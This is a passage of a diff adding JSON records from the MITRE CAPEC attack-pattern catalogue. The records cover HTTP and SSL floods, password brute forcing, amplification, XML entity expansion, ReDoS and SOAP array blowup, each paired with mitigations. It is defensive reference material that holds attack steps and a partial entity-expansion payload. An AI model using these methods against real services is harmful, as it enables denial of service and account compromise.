"identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aec19b04-5aac-4130-b0dc-e5bb2841bab7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fb127f46-6f57-4569-b6c8-e5ae71cdaee4", + "target_ref": "attack-pattern--2e017307-7bab-419b-972c-8dae9e089572", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using the HTTP protocol with the intent to deny legitimate users access to a service by consuming resources at the application layer such as web services and their infrastructure. These attacks use legitimate session-based HTTP GET requests designed to consume large amounts of a server's resources. Since these are legitimate sessions this attack is very difficult to detect.", + "external_references": [ + { + "external_id": "CAPEC-488", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/488.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Endpoint Denial of Service:Service Exhaustion Flood", + "external_id": "T1499.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/002" + }, + { + "description": "HTTP Flood Attack", + "external_id": "REF-751", + "source_name": "reference_from_CAPEC", + "url": "https://www.cloudflare.com/learning/ddos/http-flood-ddos-attack/" + } + ], + "id": "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "modified": "2023-01-24T00:00:00.000Z", + "name": "HTTP Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of HTTP traffic to send to a target server." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use a Web Application Firewall (WAF) to help filter out malicious traffic. This can be setup with rules to block IP addresses found in IP reputation databases, which contains lists of known bad IP addresses. Analysts should also monitor when the traffic flow becomes abnormally large, and be able to add on-the-fly rules to block malicious traffic. Special care should be taken to ensure low false positive rates in block rules and functionality should be implemented to allow a legitimate user to resume sending traffic if they have been blocked.", + "id": "course-of-action--91772dc5-fe8a-4269-bfa0-671a24b28802", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-488-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2df5c397-b1c2-490a-a993-838b4e8133e2", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--91772dc5-fe8a-4269-bfa0-671a24b28802", + "target_ref": "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Hire a third party provider to implement a Web Application Firewall (WAF) for your application. Third party providers have dedicated resources and expertise that could allow them to update rules and prevent HTTP Floods very quickly.", + "id": "course-of-action--f0c4e955-f793-4d04-8e9d-01df99203e2c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-488-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c6b16353-b7d5-4409-ba94-29ac4ce19d53", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f0c4e955-f793-4d04-8e9d-01df99203e2c", + "target_ref": "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Use a load balancer such as nginx to prevent small scale HTTP Floods by dispersing traffic between a group of servers.", + "id": "course-of-action--bd3779cc-34f7-46d6-9bcc-b1e3033b6a6c", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-488-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0e03bb28-5d04-4d80-bdde-2dfb7c21ebf1", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bd3779cc-34f7-46d6-9bcc-b1e3033b6a6c", + "target_ref": "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Make a requesting machine solve some kind of challenge before allowing them to send an HTTP request. This could be a captcha or something similar that works to deter bots.", + "id": "course-of-action--389ae813-989b-4b94-97f0-c8af9ebdbb16", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-488-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3b18f53c-3cc4-414f-aee4-c0537c3b432f", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--389ae813-989b-4b94-97f0-c8af9ebdbb16", + "target_ref": "attack-pattern--d43c7ffa-16a5-4eb9-8c29-3391cc7ff269", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute a flooding attack using the SSL protocol with the intent to deny legitimate users access to a service by consuming all the available resources on the server side. These attacks take advantage of the asymmetric relationship between the processing power used by the client and the processing power used by the server to create a secure connection. In this manner the attacker can make a large number of HTTPS requests on a low provisioned machine to tie up a disproportionately large number of resources on the server. The clients then continue to keep renegotiating the SSL connection. When multiplied by a large number of attacking machines, this attack can result in a crash or loss of service to legitimate users.", + "external_references": [ + { + "external_id": "CAPEC-489", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/489.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Endpoint Denial of Service:Service Exhaustion Flood", + "external_id": "T1499.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1499/002" + } + ], + "id": "attack-pattern--f30a7c37-4d87-41d2-a103-c995948076f3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "SSL Flood", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the ability to generate a large amount of SSL traffic to send a target server." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, an organization can create rule based filters to silently drop connections if too many are attempted in a certain time period.", + "id": "course-of-action--6d85f1a8-2ea9-4b71-946c-770993335e06", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-489-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--63e515c5-ea52-4e4c-947f-ddf3f6b91725", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6d85f1a8-2ea9-4b71-946c-770993335e06", + "target_ref": "attack-pattern--f30a7c37-4d87-41d2-a103-c995948076f3", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary tries every possible value for a password until they succeed. A brute force attack, if feasible computationally, will always be successful because it will essentially go through all possible passwords given the alphabet used (lower case letters, upper case letters, numbers, symbols, etc.) and the maximum length of the password.", + "external_references": [ + { + "external_id": "CAPEC-49", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/49.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-257", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/257.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-307", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/307.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "description": "Brute Force:Password Guessing", + "external_id": "T1110.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1110/001" + } + ], + "id": "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Password Brute Forcing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--7b423196-9de6-400f-91de-a1f26b3f19f1" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n A system does not enforce a strong password policy and the user picks a five letter password consisting of lower case English letters only. The system does not implement any password throttling mechanism. Assuming the adversary does not know the length of the users' password, an adversary can brute force this password in maximum 1+26+26^2+26^3+26^4+26^5 = 1 + 26 + 676 + 17576 + 456976 + 11,881,376 = 12,356,631 attempts, and half these tries (6,178,316) on average. Using modern hardware this attack is trivial. If the adversary were to assume that the user password could also contain upper case letters (and it was case sensitive) and/or numbers, than the number of trials would have been larger.\n An adversary's job would have most likely been even easier because many users who choose easy to brute force passwords like this are also likely to use a word that can be found in the dictionary. Since there are far fewer valid English words containing up to five letters than 12,356,631, an attack that tries each of the entries in the English dictionary would go even faster.\n ", + "A weakness exists in the automatic password generation routine of Mailman prior to 2.1.5 that causes only about five million different passwords to be generated. This makes it easy to brute force the password for all users who decided to let Mailman automatically generate their passwords for them. Users who chose their own passwords during the sign up process would not have been affected (assuming that they chose strong passwords). See also: CVE-2004-1143" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine application's/system's password policy: Determine the password policies of the target application/system.

    2. Techniques
    Determine minimum and maximum allowed password lengths.
    Determine format of allowed passwords (whether they are required or allowed to contain numbers, special characters, etc.).
    Determine account lockout policy (a strict account lockout policy will prevent brute force attacks).

Exploit

  1. Brute force password: Given the finite space of possible passwords dictated by the password policy determined in the previous step, try all possible passwords for a known user ID until application/system grants access.

    2. Techniques
    Manually or automatically enter all possible passwords through the application/system's interface. In most systems, start with the shortest and simplest possible passwords, because most users tend to select such passwords if allowed to do so.
    Perform an offline dictionary attack or a rainbow table attack against a known password hash.
", + "x_capec_extended_description": "\n A system will be particularly vulnerable to this type of an attack if it does not have a proper enforcement mechanism in place to ensure that passwords selected by users are strong passwords that comply with an adequate password policy. In practice a pure brute force attack on passwords is rarely used, unless the password is suspected to be weak. Other password cracking methods exist that are far more effective (e.g. dictionary attacks, rainbow tables, etc.). Knowing the password policy on the system can make a brute force attack more efficient. For instance, if the policy states that all passwords must be of a certain level, there is no need to check smaller candidates.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--a9dc4914-409a-4f71-80df-c5cc3923d112", + "attack-pattern--a390cb72-b4de-4750-ae05-be556c89f4be", + "attack-pattern--f724f0f3-20e6-450c-be4a-f373ea08834d", + "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170" + ], + "x_capec_prerequisites": [ + "An adversary needs to know a username to target.", + "The system uses password based authentication as the one factor authentication mechanism.", + "An application does not have a password throttling mechanism in place. A good password throttling mechanism will make it almost impossible computationally to brute force a password as it may either lock out the user after a certain number of incorrect attempts or introduce time out periods. Both of these would make a brute force attack impractical." + ], + "x_capec_resources_required": [ + "A powerful enough computer for the job with sufficient CPU, RAM and HD. Exact requirements will depend on the size of the brute force job and the time requirement for completion. Some brute forcing jobs may require grid or distributed computing (e.g. DES Challenge)." + ], + "x_capec_skills_required": { + "Low": "A brute force attack is very straightforward. A variety of password cracking tools are widely available." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement a password throttling mechanism. This mechanism should take into account both the IP address and the log in name of the user.", + "id": "course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-49-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a2efb506-562c-41e5-afef-c5f89f5bf4ab", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382", + "target_ref": "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Put together a strong password policy and make sure that all user created passwords comply with it. Alternatively automatically generate strong passwords for users.", + "id": "course-of-action--67382257-6794-48ac-82a0-f33260b6f0db", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-49-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c0f08626-b782-458e-bf5e-36ceaf04f850", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--67382257-6794-48ac-82a0-f33260b6f0db", + "target_ref": "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Passwords need to be recycled to prevent aging, that is every once in a while a new password must be chosen.", + "id": "course-of-action--bb36d937-986b-43eb-aa65-3e773af8ce32", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-49-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fb2ec194-be12-4cc9-8d13-70492fffaff4", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bb36d937-986b-43eb-aa65-3e773af8ce32", + "target_ref": "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute an amplification where the size of a response is far greater than that of the request that generates it. The goal of this attack is to use a relatively few resources to create a large amount of traffic against a target server. To execute this attack, an adversary send a request to a 3rd party service, spoofing the source address to be that of the target server. The larger response that is generated by the 3rd party service is then sent to the target server. By sending a large number of initial requests, the adversary can generate a tremendous amount of traffic directed at the target. The greater the discrepancy in size between the initial request and the final payload delivered to the target increased the effectiveness of this attack.", + "external_references": [ + { + "external_id": "CAPEC-490", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/490.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "Network Denial of Service:Reflection Amplification", + "external_id": "T1498.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1498/002" + } + ], + "id": "attack-pattern--e68b5623-7a7a-45f8-896f-12b38bedc838", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Amplification", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--6854fe89-0829-429f-a95c-89e77ab6c8ed" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_prerequisites": [ + "This type of an attack requires the existence of a 3rd party service that generates a response that is significantly larger than the request that triggers it." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "To mitigate this type of an attack, an organization can attempt to identify the 3rd party services being used in an active attack and blocking them until the attack ends. This can be accomplished by filtering traffic for suspicious message patterns such as a spike in traffic where each response contains the same large block of data. Care should be taken to prevent false positive rates so legitimate traffic isn't blocked.", + "id": "course-of-action--d0ed5ae3-a632-40b6-adec-abee22f9f753", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-490-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f777f7b6-4f71-48a6-89b5-694f5210cb6b", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d0ed5ae3-a632-40b6-adec-abee22f9f753", + "target_ref": "attack-pattern--e68b5623-7a7a-45f8-896f-12b38bedc838", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits macro-like substitution to cause a denial of service situation due to excessive memory being allocated to fully expand the data. The result of this denial of service could cause the application to freeze or crash. This involves defining a very large entity and using it multiple times in a single entity substitution. CAPEC-197 is a similar attack pattern, but it is easier to discover and defend against. This attack pattern does not perform multi-level substitution and therefore does not obviously appear to consume extensive resources.", + "external_references": [ + { + "external_id": "CAPEC-491", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/491.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + } + ], + "id": "attack-pattern--8f70b1fb-393f-4494-b4ad-67f1a2107975", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Quadratic Data Expansion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_alternate_terms": [ + "XML Entity Expansion (XEE)" + ], + "x_capec_can_follow_refs": [ + "attack-pattern--5cf3eacf-a0c6-4c59-9f97-4f677a90587a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8abd01d1-b2a2-4b86-a640-7d3d3b61d27f" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (Denial of Service)", + "Resource Consumption (Denial of Service)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n In this example the attacker defines one large entity and refers to it many times.\n ... [100K of them] ...AAAA\">]>&x;&x;... [100K of them]...&x;&x;\n This results in a relatively small message of 100KBs that will expand to a message in the GB range.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the target: An adversary determines the input data stream that is being processed by a data parser that supports using substituion on the victim's side.

    2. Techniques
    Use an automated tool to record all instances of URLs to process requests.
    Use a browser to manually explore the website and analyze how the application processes requests.

Exploit

  1. Craft malicious payload: The adversary crafts malicious message containing nested quadratic expansion that completely uses up available server resource.

  2. Send the message: Send the malicious crafted message to the target URL.

", + "x_capec_prerequisites": [ + "This type of attack requires a server that accepts serialization data which supports substitution and parses the data." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--02109430-cdab-456f-831f-cbf8dc34209a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7cdc228e-d1d1-40c4-b9c4-9e9f89b3df71", + "target_ref": "attack-pattern--8f70b1fb-393f-4494-b4ad-67f1a2107975", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--aad3b8f3-e7c0-49fd-8535-2db1e2a789ee", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2a17594-fbe4-4682-92b8-c64f405f7e3c", + "target_ref": "attack-pattern--8f70b1fb-393f-4494-b4ad-67f1a2107975", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute an attack on a program that uses a poor Regular Expression(Regex) implementation by choosing input that results in an extreme situation for the Regex. A typical extreme situation operates at exponential time compared to the input size. This is due to most implementations using a Nondeterministic Finite Automaton(NFA) state machine to be built by the Regex algorithm since NFA allows backtracking and thus more complex regular expressions.", + "external_references": [ + { + "external_id": "CAPEC-492", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/492.html" + }, + { + "external_id": "CWE-400", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/400.html" + }, + { + "external_id": "CWE-1333", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1333.html" + }, + { + "description": "Regular expression Denial of Service - ReDoS", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS" + }, + { + "description": "Bryan Sullivan, Regular Expression Denial of Service Attacks and Defenses", + "external_id": "REF-421", + "source_name": "reference_from_CAPEC", + "url": "http://msdn.microsoft.com/en-au/magazine/ff646973.aspx" + } + ], + "id": "attack-pattern--dcf12181-3652-40c9-bb64-b09d367d2fb1", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Regular Expression Exponential Blowup", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--e171fd74-3ea6-4ad5-b0ff-71bb311c8024" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n The algorithm builds a finite state machine and based on the input transitions through all the states until the end of the input is reached. NFA engines may evaluate each character in the input string multiple times during the backtracking. The algorithm tries each path through the NFA one by one until a match is found; the malicious input is crafted so every path is tried which results in a failure. Exploitation of the Regex results in programs hanging or taking a very long time to complete. These attacks may target various layers of the Internet due to regular expressions being used in validation.\n ", + "x_capec_prerequisites": [ + "This type of an attack requires the ability to identify hosts running a poorly implemented Regex, and the ability to send crafted input to exploit the regular expression." + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Test custom written Regex with fuzzing to determine if the Regex is a poor one. Add timeouts to processes that handle the Regex logic. If an evil Regex is found rewrite it as a good Regex.", + "id": "course-of-action--304c8c69-2778-4990-bcbc-b9dcdf357054", + "modified": "2022-02-22T00:00:00.000Z", + "name": "coa-492-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--cbd942cb-719b-4645-a9fe-77e24232dbee", + "modified": "2022-02-22T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--304c8c69-2778-4990-bcbc-b9dcdf357054", + "target_ref": "attack-pattern--dcf12181-3652-40c9-bb64-b09d367d2fb1", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may execute an attack on a web service that uses SOAP messages in communication. By sending a very large SOAP array declaration to the web service, the attacker forces the web service to allocate space for the array elements before they are parsed by the XML parser. The attacker message is typically small in size containing a large array declaration of say 1,000,000 elements and a couple of array elements. This attack targets exhaustion of the memory resources of the web service.", + "external_references": [ + { + "external_id": "CAPEC-493", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/493.html" + }, + { + "external_id": "CWE-770", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/770.html" + }, + { + "description": "SOAP Array Attack", + "external_id": "REF-422", + "source_name": "reference_from_CAPEC", + "url": "http://www.ws-attacks.org/index.php/Soap_Array_Attack" + } + ], + "id": "attack-pattern--c0166c89-dd49-46a7-9359-88a2c9d053e3", + "modified": "2019-09-30T00:00:00.000Z", + "name": "SOAP Array Blowup", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + 